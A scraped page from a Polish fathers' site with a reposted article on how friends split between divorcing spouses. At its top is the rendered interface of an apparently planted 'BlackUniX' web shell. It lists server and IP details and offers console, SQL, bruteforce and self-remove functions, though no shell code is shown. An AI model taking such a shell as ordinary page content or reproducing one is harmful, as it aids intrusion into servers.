W Stronę Ojca i no co ty Tato

Polecamy

Zamów nasz biuletyn
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-21 19:51:50
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.166.141.12
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Ty weź lodówkę, ja zabiorę naszych znajomych!
10.08.2009.
Gdy para małżeńska rozstaje się po kilku latach związku, oprócz wspólnych wspomnień i ruchomego majątku, do podziału stawiają się też wspólni znajomi. Bardzo szybko okazuje się, że jeśli ktoś był kumplem męża, to w trakcie rozwodu stanie po jego stronie, nawet jeśli wedle rozsądku powinien trzymać stronę, przykładowo pokrzywdzonej, żony.
Lojalność działa tu według zasady: "kto był pierwszy, ten wygrywa". Wtedy przyjaciół dostaje się po prawie Choć żyjemy w czasach równouprawnienia, bardzo często zdarza się, że trzymamy się ze swoimi: panowie z panami, kobiety z kobietami. Ten najmniej logiczny i sprawiedliwy podział szczególnie smuci, gdy przyjaciele męża mogliby świadczyć w sądzie na rzecz jego żony, będąc nieraz świadkami jego knajpianych flirtów czy telefonów od obcej kobiety.

Niestety nasi partnerzy często zaczynają na własną rękę pracować nad zachowaniem jak największej liczby osób po swojej stronie. Zdarzają się wtedy kłamstwa, oczernianie, a nawet próby wciągnięcia przyjaciół na salę sądową w charakterze stron.

Nigdy nie jest tak, że wie się od razu, po której stronie stają znajomi. Zwykle trzeba się boleśnie przekonać, kogo wybrali, żeby już nigdy więcej nie wybrać ich numeru.

Zdarza się, że ludzie wolą się nie wtrącać w sytuacje rozstającej się pary, nie dopytywać, żeby nie wyjść na wścibskich. Starają się nie dokładać do ognia i na jakiś czas wstrzymują kontakty z rozwodzącymi się, żeby nie pakować się w niezręczną sytuację. Potem może byc jednak trudno podtrzymywać kontakty towarzyskie z kimś, kto na nasz widok uciekał prędko z supermarketu…

Przyjaciół rzeczywiście poznaje się w biedzie. Jedynym sposobem, żeby się co do nich przekonać, jest przejść przez tak trudną i bolesną sytuację. Nie ma na to innej rady jak tylko rozmawiać, być ze sobą szczerym, nie oczerniać swojego partnera i nie stosować sztuczek poniżej pasa. Reszta zależy od nich.

za dziennik.pl
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy potrzebna jest partia mężczyzn?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


21.06.2018.